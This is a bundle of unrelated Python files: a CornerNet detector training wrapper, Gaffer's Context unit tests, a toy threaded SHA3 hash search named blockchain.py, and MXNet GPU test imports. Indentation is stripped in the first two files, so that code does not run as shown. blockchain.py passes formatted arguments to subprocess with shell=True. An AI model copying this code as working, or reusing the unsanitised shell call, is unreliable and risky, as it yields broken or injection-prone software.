num_workers (int): Number of parallel processors for data loader
Returns:
None
'''
self.system_dict["dataset"]["train"]["root_dir"] = root_dir;
self.system_dict["dataset"]["train"]["coco_dir"] = coco_dir;
self.system_dict["dataset"]["train"]["img_dir"] = img_dir;
self.system_dict["dataset"]["train"]["set_dir"] = set_dir;
self.system_dict["dataset"]["params"]["batch_size"] = batch_size;
self.system_dict["dataset"]["params"]["workers"] = num_workers;
self.system_dict["model"]["params"]["use_gpu"] = use_gpu;
def Val_Dataset(self, root_dir, coco_dir, img_dir, set_dir):
'''
User function: Set validation dataset parameters
Dataset Directory Structure
root_dir
   |
   |------coco_dir
   |          |
   |          |----img_dir
   |          |       |
   |          |       |------<set_dir_val> (set_dir) (Validation)
   |          |                   |
   |          |                   |---------img1.jpg
   |          |                   |---------img2.jpg
   |          |                   |---------..........(and so on)
   |          |
   |          |---annotations
   |                  |
   |                  |--------------------instances_Val.json (instances_<set_dir_val>.json)
   |                  |--------------------classes.txt
- instances_Val.json -> In proper COCO format
- classes.txt -> A list of classes in alphabetical order
For ValSet
- root_dir = "..sample_dataset";
- coco_dir = "kangaroo";
- img_dir = "images";
- set_dir = "Val";
Note: The annotation file name must match the set_dir name
Args:
root_dir (str): Path to root directory containing coco_dir
coco_dir (str): Name of coco_dir containing image folder and annotation folder
img_dir (str): Name of folder containing all training and validation folders
set_dir (str): Name of folder containing all validation images
Returns:
None
'''
self.system_dict["dataset"]["val"]["status"] = True;
self.system_dict["dataset"]["val"]["root_dir"] = root_dir;
self.system_dict["dataset"]["val"]["coco_dir"] = coco_dir;
self.system_dict["dataset"]["val"]["img_dir"] = img_dir;
self.system_dict["dataset"]["val"]["set_dir"] = set_dir;
def Model(self, model_name="CornerNet_Saccade", use_distributed=False):
'''
User function: Set Model parameters
Available Models
CornerNet_Saccade
CornerNet_Squeeze
Args:
model_name (str): Select appropriate model
use_distributed (bool): If true, use distributed training
Returns:
None
'''
self.system_dict["model"]["params"]["cfg_file"] = model_name;
self.system_dict["model"]["params"]["distributed"] = use_distributed;
if(self.system_dict["model"]["params"]["distributed"]):
print("Distributed training not enabled yet");
def Hyper_Params(self, lr=0.00025, total_iterations=1000, val_interval=500):
'''
User function: Set hyper parameters
Args:
lr (float): Initial learning rate for training
total_iterations (float): Total mini batch iterations for training
val_interval (int): Number of training iterations after which a validation pass is carried out
Returns:
None
'''
self.system_dict["training"]["params"]["lr"] = lr;
self.system_dict["training"]["params"]["total_iterations"] = total_iterations;
self.system_dict["training"]["params"]["val_interval"] = val_interval;
def Setup(self):
'''
User function: Setup dataset, model and hyper-params
Args:
None
Returns:
None
'''
distributed = self.system_dict["model"]["params"]["distributed"]
world_size = self.system_dict["model"]["params"]["world_size"]
ngpus_per_node = torch.cuda.device_count()
current_dir = os.path.dirname(os.path.realpath(__file__));
cfg_file = os.path.join(current_dir, "configs", self.system_dict["model"]["params"]["cfg_file"] + ".json")
with open(cfg_file, "r") as f:
self.system_dict["local"]["config"] = json.load(f)
self.system_dict["local"]["config"]["db"]["root_dir"] = self.system_dict["dataset"]["train"]["root_dir"];
self.system_dict["local"]["config"]["db"]["coco_dir"] = self.system_dict["dataset"]["train"]["coco_dir"];
self.system_dict["local"]["config"]["db"]["img_dir"] = self.system_dict["dataset"]["train"]["img_dir"];
self.system_dict["local"]["config"]["db"]["set_dir"] = self.system_dict["dataset"]["train"]["set_dir"];
f = open(self.system_dict["dataset"]["train"]["root_dir"] + "/" + self.system_dict["dataset"]["train"]["coco_dir"] + "/annotations/classes.txt");
lines = f.readlines();
f.close();
self.system_dict["local"]["config"]["db"]["categories"] = len(lines);
self.system_dict["local"]["config"]["system"]["batch_size"] = self.system_dict["dataset"]["params"]["batch_size"];
self.system_dict["local"]["config"]["system"]["chunk_sizes"] = [self.system_dict["dataset"]["params"]["batch_size"]];
self.system_dict["local"]["config"]["system"]["max_iter"] = self.system_dict["training"]["params"]["total_iterations"];
self.system_dict["local"]["config"]["system"]["snapshot_name"] = self.system_dict["model"]["params"]["cfg_file"]
self.system_dict["local"]["system_config"] = SystemConfig().update_config(self.system_dict["local"]["config"]["system"])
self.system_dict["local"]["training_dbs"] = [datasets[self.system_dict["local"]["system_config"].dataset](self.system_dict["local"]["config"]["db"],
sys_config=self.system_dict["local"]["system_config"]) for _ in range(self.system_dict["dataset"]["params"]["workers"])]
if(self.system_dict["dataset"]["val"]["status"]):
self.system_dict["local"]["config"]["db"]["root_dir"] = self.system_dict["dataset"]["val"]["root_dir"];
self.system_dict["local"]["config"]["db"]["coco_dir"] = self.system_dict["dataset"]["val"]["coco_dir"];
self.system_dict["local"]["config"]["db"]["img_dir"] = self.system_dict["dataset"]["val"]["img_dir"];
self.system_dict["local"]["config"]["db"]["set_dir"] = self.system_dict["dataset"]["val"]["set_dir"];
self.system_dict["local"]["validation_db"] = datasets[self.system_dict["local"]["system_config"].dataset](self.system_dict["local"]["config"]["db"],
sys_config=self.system_dict["local"]["system_config"])
if(not os.path.isdir("cache/")):
os.mkdir("cache");
if(not os.path.isdir("cache/nnet")):
os.mkdir("cache/nnet/");
if(not os.path.isdir("cache/nnet/" + self.system_dict["model"]["params"]["cfg_file"])):
os.mkdir("cache/nnet/" + self.system_dict["model"]["params"]["cfg_file"]);
model_file = "core.models.{}".format(self.system_dict["model"]["params"]["cfg_file"])
print("Loading Model - {}".format(model_file))
model_file = importlib.import_module(model_file)
self.system_dict["local"]["model"] = model_file.model(self.system_dict["local"]["config"]["db"]["categories"])
print("Model Loaded");
def Train(self, display_interval=100):
'''
User function: Start training
Args:
display_interval (int): The training loss is printed every display_interval iterations
Returns:
None
'''
# reading arguments from command
start_iter = self.system_dict["training"]["params"]["start_iter"]
distributed = self.system_dict["model"]["params"]["distributed"]
world_size = self.system_dict["model"]["params"]["world_size"]
initialize = self.system_dict["model"]["params"]["initialize"]
gpu = None
rank = self.system_dict["model"]["params"]["rank"]
# reading arguments from json file
batch_size = self.system_dict["dataset"]["params"]["batch_size"]
learning_rate = self.system_dict["training"]["params"]["lr"]
max_iteration = self.system_dict["training"]["params"]["total_iterations"]
pretrained_model = None;
stepsize = int(self.system_dict["training"]["params"]["total_iterations"]*0.8)
snapshot = int(self.system_dict["training"]["params"]["total_iterations"]*0.5)
val_iter = self.system_dict["training"]["params"]["val_interval"]
display = display_interval
decay_rate = self.system_dict["local"]["system_config"].decay_rate
print("start_iter = {}".format(start_iter));
print("distributed = {}".format(distributed));
print("world_size = {}".format(world_size));
print("initialize = {}".format(initialize));
print("batch_size = {}".format(batch_size));
print("learning_rate = {}".format(learning_rate));
print("max_iteration = {}".format(max_iteration));
print("stepsize = {}".format(stepsize));
print("snapshot = {}".format(snapshot));
print("val_iter = {}".format(val_iter));
print("display = {}".format(display));
print("decay_rate = {}".format(decay_rate));
print("Process {}: building model...".format(rank))
self.system_dict["local"]["nnet"] = NetworkFactory(self.system_dict["local"]["system_config"],
self.system_dict["local"]["model"], distributed=distributed, gpu=gpu)
# queues storing data for training
training_queue = Queue(self.system_dict["local"]["system_config"].prefetch_size)
validation_queue = Queue(5)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(self.system_dict["local"]["system_config"].prefetch_size)
pinned_validation_queue = queue.Queue(5)
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(self.system_dict["local"]["system_config"],
self.system_dict["local"]["training_dbs"],
training_queue, data_sampling_func, True)
if self.system_dict["dataset"]["val"]["status"]:
validation_tasks = init_parallel_jobs(self.system_dict["local"]["system_config"],
[self.system_dict["local"]["validation_db"]],
validation_queue, data_sampling_func, False)
training_pin_semaphore = threading.Semaphore()
validation_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
validation_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
validation_pin_args = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
validation_pin_thread.daemon = True
validation_pin_thread.start()
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("Process {}: loading from pretrained model".format(rank))
self.system_dict["local"]["nnet"].load_pretrained_params(pretrained_model)
if start_iter:
self.system_dict["local"]["nnet"].load_params(start_iter)
learning_rate /= (decay_rate ** (start_iter // stepsize))
self.system_dict["local"]["nnet"].set_lr(learning_rate)
print("Process {}: training starts from iteration {} with learning_rate {}".format(rank, start_iter + 1, learning_rate))
else:
self.system_dict["local"]["nnet"].set_lr(learning_rate)
if rank == 0:
print("training start...")
self.system_dict["local"]["nnet"].cuda()
self.system_dict["local"]["nnet"].train_mode()
if(self.system_dict["dataset"]["val"]["status"]):
old_val_loss = 100000.0;
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = self.system_dict["local"]["nnet"].train(**training)
if display and iteration % display == 0:
print("Process {}: training loss at iteration {}: {}".format(rank, iteration, training_loss.item()))
del training_loss
if val_iter and self.system_dict["local"]["validation_db"].db_inds.size and iteration % val_iter == 0:
self.system_dict["local"]["nnet"].eval_mode()
validation = pinned_validation_queue.get(block=True)
validation_loss = self.system_dict["local"]["nnet"].validate(**validation)
print("Process {}: validation loss at iteration {}: {}".format(rank, iteration, validation_loss.item()))
if(validation_loss < old_val_loss):
print("Loss Reduced from {} to {}".format(old_val_loss, validation_loss))
self.system_dict["local"]["nnet"].save_params("best");
old_val_loss = validation_loss;
else:
print("validation loss did not go below {}, current loss - {}".format(old_val_loss, validation_loss))
self.system_dict["local"]["nnet"].train_mode()
if iteration % stepsize == 0:
learning_rate /= decay_rate
self.system_dict["local"]["nnet"].set_lr(learning_rate)
self.system_dict["local"]["nnet"].save_params("final");
# sending signal to kill the thread
training_pin_semaphore.release()
validation_pin_semaphore.release()
# terminating data fetching processes
terminate_tasks(training_tasks)
terminate_tasks(validation_tasks)
else:
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = self.system_dict["local"]["nnet"].train(**training)
if display and iteration % display == 0:
print("Process {}: training loss at iteration {}: {}".format(rank, iteration, training_loss.item()))
del training_loss
if(iteration % val_iter == 0):
self.system_dict["local"]["nnet"].save_params("intermediate");
if iteration % stepsize == 0:
learning_rate /= decay_rate
self.system_dict["local"]["nnet"].set_lr(learning_rate)
self.system_dict["local"]["nnet"].save_params("final");
# sending signal to kill the thread
training_pin_semaphore.release()
# terminating data fetching processes
terminate_tasks(training_tasks)
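# --- Illustrative usage sketch (not part of the original module) ---
# A minimal, hedged end-to-end driver for the Detector wrapper above.
# The dataset paths follow the directory layout documented in
# Train_Dataset()/Val_Dataset() and are placeholders for a real dataset.
def _example_training_run():
    gtf = Detector(verbose=1)
    gtf.Train_Dataset(root_dir="../sample_dataset", coco_dir="kangaroo",
                      img_dir="images", set_dir="Train",
                      batch_size=4, use_gpu=True, num_workers=4)
    gtf.Val_Dataset(root_dir="../sample_dataset", coco_dir="kangaroo",
                    img_dir="images", set_dir="Val")
    gtf.Model(model_name="CornerNet_Saccade", use_distributed=False)
    gtf.Hyper_Params(lr=0.00025, total_iterations=1000, val_interval=500)
    gtf.Setup()
    gtf.Train(display_interval=100)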
|
ContextTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import weakref
import IECore
import Gaffer
import GafferTest
class ContextTest( GafferTest.TestCase ) :
def testFrameAccess( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c["frame"], 1.0 )
c.setFrame( 10.5 )
self.assertEqual( c.getFrame(), 10.5 )
self.assertEqual( c["frame"], 10.5 )
def testChangedSignal( self ) :
c = Gaffer.Context()
changes = []
def f( context, name ) :
self.failUnless( context.isSame( c ) )
changes.append( ( name, context[name] ) )
cn = c.changedSignal().connect( f )
c["a"] = 2
self.assertEqual( changes, [ ( "a", 2 ) ] )
c["a"] = 3
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ) ] )
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# when an assignment makes no actual change, the signal should not
# be triggered again.
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
def testTypes( self ) :
c = Gaffer.Context()
c["int"] = 1
self.assertEqual( c["int"], 1 )
self.assertEqual( c.get( "int" ), 1 )
c.set( "int", 2 )
self.assertEqual( c["int"], 2 )
self.failUnless( isinstance( c["int"], int ) )
c["float"] = 1.0
self.assertEqual( c["float"], 1.0 )
self.assertEqual( c.get( "float" ), 1.0 )
c.set( "float", 2.0 )
self.assertEqual( c["float"], 2.0 )
self.failUnless( isinstance( c["float"], float ) )
c["string"] = "hi"
self.assertEqual( c["string"], "hi" )
self.assertEqual( c.get( "string" ), "hi" )
c.set( "string", "bye" )
self.assertEqual( c["string"], "bye" )
self.failUnless( isinstance( c["string"], basestring ) )
def testCopying( self ) :
c = Gaffer.Context()
c["i"] = 10
c2 = Gaffer.Context( c )
self.assertEqual( c2["i"], 10 )
c["i"] = 1
self.assertEqual( c["i"], 1 )
self.assertEqual( c2["i"], 10 )
def testEquality( self ) :
c = Gaffer.Context()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
self.failIf( c != c2 )
c["somethingElse"] = 1
self.assertNotEqual( c, c2 )
self.failIf( c == c2 )
def testCurrent( self ) :
# if nothing has been made current then there should be a default
# constructed context in place.
c = Gaffer.Context.current()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
# and we should be able to change that using the with statement
c2["something"] = 1
with c2 :
self.failUnless( Gaffer.Context.current().isSame( c2 ) )
self.assertEqual( Gaffer.Context.current()["something"], 1 )
# and bounce back to the original
self.failUnless( Gaffer.Context.current().isSame( c ) )
def testCurrentIsThreadSpecific( self ) :
c = Gaffer.Context()
self.failIf( c.isSame( Gaffer.Context.current() ) )
def f() :
self.failIf( c.isSame( Gaffer.Context.current() ) )
with Gaffer.Context() :
pass
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
t = threading.Thread( target = f )
t.start()
t.join()
self.failUnless( c.isSame( Gaffer.Context.current() ) )
self.failIf( c.isSame( Gaffer.Context.current() ) )
def testThreading( self ) :
# for good measure, run testCurrent() in a load of threads at
# the same time.
threads = []
for i in range( 0, 1000 ) :
t = threading.Thread( target = self.testCurrent )
t.start()
threads.append( t )
for t in threads :
t.join()
def testSetWithObject( self ) :
c = Gaffer.Context()
v = IECore.StringVectorData( [ "a", "b", "c" ] )
c.set( "v", v )
self.assertEqual( c.get( "v" ), v )
self.failIf( c.get( "v" ).isSame( v ) )
self.assertEqual( c["v"], v )
self.failIf( c["v"].isSame( v ) )
def testGetWithDefault( self ) :
c = Gaffer.Context()
self.assertRaises( RuntimeError, c.get, "f" )
self.assertEqual( c.get( "f", 10 ), 10 )
c["f"] = 1.0
self.assertEqual( c.get( "f" ), 1.0 )
def testReentrancy( self ) :
c = Gaffer.Context()
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
def testLifeTime( self ) :
c = Gaffer.Context()
w = weakref.ref( c )
self.failUnless( w() is c )
with c :
pass
del c
self.failUnless( w() is None )
def testWithBlockReturnValue( self ) :
with Gaffer.Context() as c :
self.failUnless( isinstance( c, Gaffer.Context ) )
self.failUnless( c.isSame( Gaffer.Context.current() ) )
def testSubstitute( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "$a/$b/something.###.tif" ), "apple/bear/something.020.tif" )
self.assertEqual( c.substitute( "$a/$dontExist/something.###.tif" ), "apple//something.020.tif" )
self.assertEqual( c.substitute( "${badlyFormed" ), "" )
def testHasSubstitutions( self ) :
c = Gaffer.Context()
self.assertFalse( c.hasSubstitutions( "a" ) )
self.assertTrue( c.hasSubstitutions( "~something" ) )
self.assertTrue( c.hasSubstitutions( "$a" ) )
self.assertTrue( c.hasSubstitutions( "${a}" ) )
self.assertTrue( c.hasSubstitutions( "###" ) )
def testNames( self ) :
c = Gaffer.Context()
self.assertEqual( set( c.names() ), set( [ "frame" ] ) )
c["a"] = 10
self.assertEqual( set( c.names() ), set( [ "frame", "a" ] ) )
cc = Gaffer.Context( c )
self.assertEqual( set( cc.names() ), set( [ "frame", "a" ] ) )
cc["b"] = 20
self.assertEqual( set( cc.names() ), set( [ "frame", "a", "b" ] ) )
self.assertEqual( set( c.names() ), set( [ "frame", "a" ] ) )
self.assertEqual( cc.names(), cc.keys() )
def testManyContexts( self ) :
GafferTest.testManyContexts()
def testGetWithAndWithoutCopying( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
# we should be getting a copy each time by default
self.assertFalse( c["test"].isSame( c["test"] ) )
# meaning that if we modify the returned value, no harm is done
c["test"].append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2 ] ) )
# if we ask nicely, we can get a reference to the internal
# value without any copying.
self.assertTrue( c.get( "test", _copy=False ).isSame( c.get( "test", _copy=False ) ) )
# but then if we modify the returned value, we are changing the
# context itself too. this should be avoided - we're just doing it
# here to test that we are indeed referencing the internal value.
c.get( "test", _copy=False ).append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2, 10 ] ) )
def testGetWithDefaultAndCopyArgs( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
self.assertTrue( c.get( "test", 10, _copy=False ).isSame( c.get( "test", 20, _copy=False ) ) )
self.assertTrue( c.get( "test", defaultValue=10, _copy=False ).isSame( c.get( "test", defaultValue=20, _copy=False ) ) )
def testCopyWithSharedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# both contexts reference the same object, but c2 at least owns
# a reference to its values, and can be used after c1 has been
# deleted.
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r + 1 )
del c1
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
def testCopyWithBorrowedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# check that c2 doesn't own a reference
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# make sure we delete c2 before we delete c1
del c2
# check that we're ok to access c1 after deleting c2
self.assertEqual( c1["testInt"], 20 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
def testSetOnBorrowedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsReleasesReference( self ) :
c1 = Gaffer.Context()
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1.get( "testIntVector", _copy=False ).refCount(), r )
def testHash( self ) :
c = Gaffer.Context()
hashes = [ c.hash() ]
c["test"] = 1
hashes.append( c.hash() )
c["test"] = 2
hashes.append( c.hash() )
c["test2"] = "test2"
hashes.append( c.hash() )
self.assertEqual( len( hashes ), 4 )
self.assertEqual( len( set( str( h ) for h in hashes ) ), len( hashes ) )
c["test2"] = "test2" # no change
self.assertEqual( c.hash(), hashes[-1] )
def testChanged( self ) :
c = Gaffer.Context()
c["test"] = IECore.StringVectorData( [ "one" ] )
h = c.hash()
cs = GafferTest.CapturingSlot( c.changedSignal() )
d = c.get( "test", _copy = False ) # dangerous! the context won't know if we make changes
d.append( "two" )
self.assertEqual( c.get( "test" ), IECore.StringVectorData( [ "one", "two" ] ) )
self.assertEqual( len( cs ), 0 )
c.changed( "test" ) # let the context know what we've been up to
self.assertEqual( len( cs ), 1 )
self.assertEqual( cs[0], ( c, "test" ) )
self.assertNotEqual( c.hash(), h )
def testHashIgnoresUIEntries( self ) :
c = Gaffer.Context()
h = c.hash()
c["ui:test"] = 1
self.assertEqual( h, c.hash() )
def testManySubstitutions( self ) :
GafferTest.testManySubstitutions()
def testEscapedSubstitutions( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "\${a}.\$b" ), "${a}.$b" )
self.assertEqual( c.substitute( "\~" ), "~" )
self.assertEqual( c.substitute( "\#\#\#\#" ), "####" )
# really we're passing \\ to substitute and getting back \ -
# the extra slashes are escaping for the python interpreter.
self.assertEqual( c.substitute( "\\\\" ), "\\" )
self.assertEqual( c.substitute( "\\" ), "" )
self.assertTrue( c.hasSubstitutions( "\\" ) ) # must return true, because escaping affects substitution
self.assertTrue( c.hasSubstitutions( "\\\\" ) ) # must return true, because escaping affects substitution
def testRemove( self ) :
c = Gaffer.Context()
c["a"] = "apple"
c["b"] = "bear"
c["c"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a", "b", "c", "frame" ] ) )
# test Context.remove()
c.remove( "a" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "c", "frame" ] ) )
h = c.hash()
# test Context.__delitem__()
del c[ "c" ]
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "frame" ] ) )
self.assertEqual( c["b"], "bear" )
def testContains( self ) :
c = Gaffer.Context()
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
c["a"] = 1
self.assertTrue( "a" in c )
self.assertFalse( "a" not in c )
del c["a"]
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
if __name__ == "__main__":
unittest.main()
|
blockchain.py
|
import time
import hashlib
import subprocess
from threading import Thread
from queue import Queue
"""
import sys
import hashlib
def subbandthread(word, zeros, start, end):
for number in range(start, end):
hashBuffer = hashlib.sha3_512(bytes(word + "{}".format(number), "utf-8")).hexdigest()
if hashBuffer[:zeros] == zeros * "0": break
print(hashBuffer)
return "\nMatch : " + hashBuffer + "\nCheck : {}\n".format(number)
out = subbandthread(str(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4]))
with open('result.txt', '+a') as result:
result.write(out)
"""
class BlockChain:
def __init__(self, word, zeros=3, threads=128, rangeOfBandes=1_000_000_000):
self.word = word
self.zeros = zeros
self.threads = threads
self.rangeOfBandes = rangeOfBandes
    def router(self, thread, queue, word, zeros, log=True):
        """
        Worker loop: pull one (start, end) band off the queue at a time and
        delegate it to the subbandthread.py helper shown in the module docstring.
        """
        while True:
            startband, endband = queue.get()
            if log: print("{0} Thread <{1}>".format(time.ctime(), thread))
            # exactly one get() per task_done(), otherwise queue.join() never returns
            subprocess.call("python subbandthread.py {} {} {} {}".format(word, zeros, startband, endband),
                            shell=True,
                            stdout=subprocess.DEVNULL,
                            stderr=subprocess.STDOUT)
            queue.task_done()
    @property
    def run(self):
        queue = Queue()
        subband = self.rangeOfBandes // self.threads
        # split the search range into one contiguous (start, end) band per thread
        bandes = [(i * subband, (i + 1) * subband) for i in range(self.threads)]
        for thread in range(self.threads):
            worker = Thread(target=self.router, args=(thread, queue, self.word, self.zeros))
            worker.daemon = True
            worker.start()
        for band in bandes:
            queue.put(band)
        queue.join()
# Example: kick off the threaded search. `run` is a property, so accessing it
# starts the workers; it returns None, so there is nothing useful to print.
BlockChain("a", 4, 512).run
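# Illustrative sketch (not part of the original script): the Thread + Queue
# producer/consumer pattern that BlockChain.run relies on, reduced to a trivial
# task so the control flow is easy to follow.
def _queue_worker_sketch():
    from queue import Queue
    from threading import Thread
    results = []
    q = Queue()
    def worker():
        while True:
            start, end = q.get()              # one (start, end) band per iteration
            results.append(sum(range(start, end)))
            q.task_done()                     # exactly one task_done() per get()
    for _ in range(4):
        Thread(target=worker, daemon=True).start()
    for band in [(0, 10), (10, 20), (20, 30)]:
        q.put(band)
    q.join()                                  # blocks until every band is processed
    return results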
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed
from test_operator import *
from test_optimizer import *
from test_random import *
from test_gluon import *
from test_loss import *
from test_exc_handling import *
#from test_rnn import *
from test_gluon_rnn import *
from test_sparse_ndarray import test_create_csr, test_create_row_sparse, test_sparse_nd_slice
from test_sparse_ndarray import test_create_sparse_nd_empty, test_create_sparse_nd_from_sparse
from test_sparse_ndarray import test_create_sparse_nd_from_dense, test_create_sparse_nd_infer_shape
from test_sparse_ndarray import test_sparse_nd_check_format, test_sparse_nd_copy
from test_sparse_ndarray import test_sparse_nd_setitem, test_sparse_nd_binary_scalar_op
from test_sparse_operator import *
from test_ndarray import *
